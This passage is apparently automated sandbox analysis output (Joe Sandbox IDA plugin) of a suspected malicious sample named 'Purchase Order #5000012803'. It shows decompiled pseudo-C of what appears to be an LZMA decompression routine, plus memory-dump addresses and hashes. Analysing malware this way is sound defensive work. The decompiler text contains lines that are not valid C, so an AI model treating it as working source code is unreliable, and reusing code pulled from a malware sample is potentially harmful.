                      							_v68 = 3;
                      							goto L147;
                      						case 0x14:
                      							_v52 = _v52 + __ebx;
                      							__eax = _v132;
                      							goto L143;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                      							goto L123;
                      						case 0x16:
                      							__eax = _v52;
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx = _v8;
                      							_v68 = 6;
                      							__eax = __eax << 7;
                      							_v128 = 0x19;
                      							_v92 = __eax;
                      							goto L148;
                      						case 0x17:
                      							L148:
                      							__eax = _v68;
                      							_v84 = 1;
                      							_v76 = _v68;
                      							goto L152;
                      						case 0x18:
                      							L149:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x18;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t490 =  &_v116;
                      							 *_t490 = _v116 + 1;
                      							__eflags =  *_t490;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L151:
                      							_t493 =  &_v76;
                      							 *_t493 = _v76 - 1;
                      							__eflags =  *_t493;
                      							L152:
                      							__eflags = _v76;
                      							if(_v76 <= 0) {
                      								__ecx = _v68;
                      								__ebx = _v84;
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx = _v84 - (1 << __cl);
                      								__eax = _v128;
                      								_v72 = __ebx;
                      								L143:
                      								_v140 = _t561;
                      								goto L3;
                      							}
                      							__eax = _v84;
                      							_v20 = _v20 >> 0xb;
                      							__edx = _v84 + _v84;
                      							__eax = _v92;
                      							__esi = __edx + __eax;
                      							_v88 = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								_v84 = __edx;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								_v84 = _v84 << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L151;
                      							} else {
                      								goto L149;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								_v48 = __ebx;
                      								L122:
                      								_t399 =  &_v48;
                      								 *_t399 = _v48 + 1;
                      								__eflags =  *_t399;
                      								L123:
                      								__eax = _v48;
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									_v52 = _v52 | 0xffffffff;
                      									goto L173;
                      								}
                      								__eflags = __eax - _v100;
                      								if(__eax > _v100) {
                      									goto L174;
                      								}
                      								_v52 = _v52 + 2;
                      								__eax = _v52;
                      								_t406 =  &_v100;
                      								 *_t406 = _v100 + _v52;
                      								__eflags =  *_t406;
                      								goto L126;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							_v48 = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								_v76 = __ecx;
                      								L105:
                      								__eflags = _v76;
                      								if(_v76 <= 0) {
                      									__eax = __eax + __ebx;
                      									_v68 = 4;
                      									_v48 = __eax;
                      									__eax = _v8;
                      									__eax = _v8 + 0x644;
                      									__eflags = __eax;
                      									L111:
                      									__ebx = 0;
                      									_v92 = __eax;
                      									_v84 = 1;
                      									_v72 = 0;
                      									_v76 = 0;
                      									L115:
                      									__eax = _v68;
                      									__eflags = _v76 - _v68;
                      									if(_v76 >= _v68) {
                      										_t397 =  &_v48;
                      										 *_t397 = _v48 + __ebx;
                      										__eflags =  *_t397;
                      										goto L122;
                      									}
                      									__eax = _v84;
                      									_v20 = _v20 >> 0xb;
                      									__edi = _v84 + _v84;
                      									__eax = _v92;
                      									__esi = __edi + __eax;
                      									_v88 = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = (_v20 >> 0xb) * __ecx;
                      									__eflags = _v16 - __edx;
                      									if(_v16 >= __edx) {
                      										__ecx = 0;
                      										_v20 = _v20 - __edx;
                      										__ecx = 1;
                      										_v16 = _v16 - __edx;
                      										__ebx = 1;
                      										__ecx = _v76;
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx = _v72;
                      										__ebx = _v72 | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										_v72 = __ebx;
                      										 *__esi = __ax;
                      										_v84 = __edi;
                      									} else {
                      										_v20 = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										_v84 = _v84 << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags = _v20 - 0x1000000;
                      									if(_v20 >= 0x1000000) {
                      										L114:
                      										_t374 =  &_v76;
                      										 *_t374 = _v76 + 1;
                      										__eflags =  *_t374;
                      										goto L115;
                      									} else {
                      										goto L112;
                      									}
                      								}
                      								__ecx = _v16;
                      								__ebx = __ebx + __ebx;
                      								_v20 = _v20 >> 1;
                      								__eflags = _v16 - _v20;
                      								_v72 = __ebx;
                      								if(_v16 >= _v20) {
                      									__ecx = _v20;
                      									_v16 = _v16 - _v20;
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									_v72 = __ebx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								if(_v20 >= 0x1000000) {
                      									L104:
                      									_t344 =  &_v76;
                      									 *_t344 = _v76 - 1;
                      									__eflags =  *_t344;
                      									goto L105;
                      								} else {
                      									goto L102;
                      								}
                      							}
                      							__edx = _v8;
                      							__eax = __eax - __ebx;
                      							_v68 = __ecx;
                      							__eax = _v8 + 0x55e + __eax * 2;
                      							goto L111;
                      						case 0x1a:
                      							L58:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1a;
                      								goto L173;
                      							}
                      							__ecx = _v108;
                      							__al = _v96;
                      							__edx = _v12;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_v104 = _v104 - 1;
                      							 *_v108 = __al;
                      							__ecx = _v24;
                      							 *(_v12 + __ecx) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t197 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t197;
                      							goto L82;
                      						case 0x1b:
                      							L78:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1b;
                      								goto L173;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__edx = _v12;
                      							__cl =  *(__edx + __eax);
                      							__eax = _v24;
                      							_v96 = __cl;
                      							 *(__edx + __eax) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t280 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t280;
                      							__eax = _v108;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_t289 =  &_v104;
                      							 *_t289 = _v104 - 1;
                      							__eflags =  *_t289;
                      							 *_v108 = __cl;
                      							L82:
                      							_v24 = __edx;
                      							goto L83;
                      						case 0x1c:
                      							while(1) {
                      								L126:
                      								__eflags = _v104;
                      								if(_v104 == 0) {
                      									break;
                      								}
                      								__eax = _v24;
                      								__eax = _v24 - _v48;
                      								__eflags = __eax - _v120;
                      								if(__eax >= _v120) {
                      									__eax = __eax + _v120;
                      									__eflags = __eax;
                      								}
                      								__edx = _v12;
                      								__cl =  *(__edx + __eax);
                      								__eax = _v24;
                      								_v96 = __cl;
                      								 *(__edx + __eax) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t420 = __eax % _v120;
                      								__eax = __eax / _v120;
                      								__edx = _t420;
                      								__eax = _v108;
                      								_v108 = _v108 + 1;
                      								_v104 = _v104 - 1;
                      								_v52 = _v52 - 1;
                      								__eflags = _v52;
                      								 *_v108 = __cl;
                      								_v24 = _t420;
                      								if(_v52 > 0) {
                      									continue;
                      								} else {
                      									L83:
                      									_v140 = 2;
                      									goto L3;
                      								}
                      							}
                      							_v140 = 0x1c;
                      							L173:
                      							_push(0x22);
                      							_pop(_t574);
                      							memcpy(_v148,  &_v140, _t574 << 2);
                      							return 0;
                      					}
                      				}
                      				L174:
                      				_t538 = _t537 | 0xffffffff;
                      				return _t538;
                      			}










































                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                      • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E004062EB() {
                      				signed int _t539;
                      				unsigned short _t540;
                      				signed int _t541;
                      				void _t542;
                      				signed int _t543;
                      				signed int _t544;
                      				signed int _t573;
                      				signed int _t576;
                      				signed int _t597;
                      				signed int* _t614;
                      				void* _t621;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t621 - 0x40) != 1) {
                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                      						_t539 =  *(_t621 - 4) + 0x664;
                      						 *(_t621 - 0x58) = _t539;
                      						goto L68;
                      					} else {
                      						 *(__ebp - 0x84) = 8;
                      						while(1) {
                      							L132:
                      							 *(_t621 - 0x54) = _t614;
                      							while(1) {
                      								L133:
                      								_t540 =  *_t614;
                      								_t597 = _t540 & 0x0000ffff;
                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      								if( *(_t621 - 0xc) >= _t573) {
                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      									 *(_t621 - 0x40) = 1;
                      									_t541 = _t540 - (_t540 >> 5);
                      									 *_t614 = _t541;
                      								} else {
                      									 *(_t621 - 0x10) = _t573;
                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      								}
                      								if( *(_t621 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t621 - 0x6c) == 0) {
                      									 *(_t621 - 0x88) = 5;
                      									L170:
                      									_t576 = 0x22;
                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                      									_t544 = 0;
                      									L172:
                      									return _t544;
                      								}
                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t542 =  *(_t621 - 0x84);
                      								while(1) {
                      									 *(_t621 - 0x88) = _t542;
                      									while(1) {
                      										L1:
                      										_t543 =  *(_t621 - 0x88);
                      										if(_t543 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                      											case 0:
                      												if( *(_t621 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t543 =  *( *(_t621 - 0x70));
                      												if(_t543 > 0xe1) {
                      													goto L171;
                      												}
                      												_t547 = _t543 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t578);
                      												_push(9);
                      												_pop(_t579);
                      												_t617 = _t547 / _t578;
                      												_t549 = _t547 % _t578 & 0x000000ff;
                      												asm("cdq");
                      												_t612 = _t549 % _t579 & 0x000000ff;
                      												 *(_t621 - 0x3c) = _t612;
                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                      													L10:
                      													if(_t620 == 0) {
                      														L12:
                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t620 = _t620 - 1;
                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                      													} while (_t620 != 0);
                      													goto L12;
                      												}
                      												if( *(_t621 - 4) != 0) {
                      													GlobalFree( *(_t621 - 4));
                      												}
                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t621 - 4) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t45 = _t621 - 0x48;
                      												 *_t45 =  *(_t621 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t621 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t555 =  *(_t621 - 0x40);
                      												if(_t555 ==  *(_t621 - 0x74)) {
                      													L20:
                      													 *(_t621 - 0x48) = 5;
                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t621 - 0x74) = _t555;
                      												if( *(_t621 - 8) != 0) {
                      													GlobalFree( *(_t621 - 8));
                      												}
                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                      												 *(_t621 - 8) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                      												 *(_t621 - 0x84) = 6;
                      												 *(_t621 - 0x4c) = _t562;
                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                      												goto L132;
                      											case 3:
                      												L21:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												_t67 = _t621 - 0x70;
                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                      												if( *(_t621 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t540 =  *_t614;
                      												_t597 = _t540 & 0x0000ffff;
                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      												if( *(_t621 - 0xc) >= _t573) {
                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      													 *(_t621 - 0x40) = 1;
                      													_t541 = _t540 - (_t540 >> 5);
                      													 *_t614 = _t541;
                      												} else {
                      													 *(_t621 - 0x10) = _t573;
                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      												}
                      												if( *(_t621 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												goto L0;
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t258;
                      												0 | _t258 = _t258 + _t258 + 9;
                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      												goto L75;
                      											case 0xa:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xb;
                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												L88:
                      												__ecx =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x2c) = __eax;
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												L89:
                      												__eax =  *(__ebp - 4);
                      												 *(__ebp - 0x80) = 0x15;
                      												__eax =  *(__ebp - 4) + 0xa68;
                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      												goto L68;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
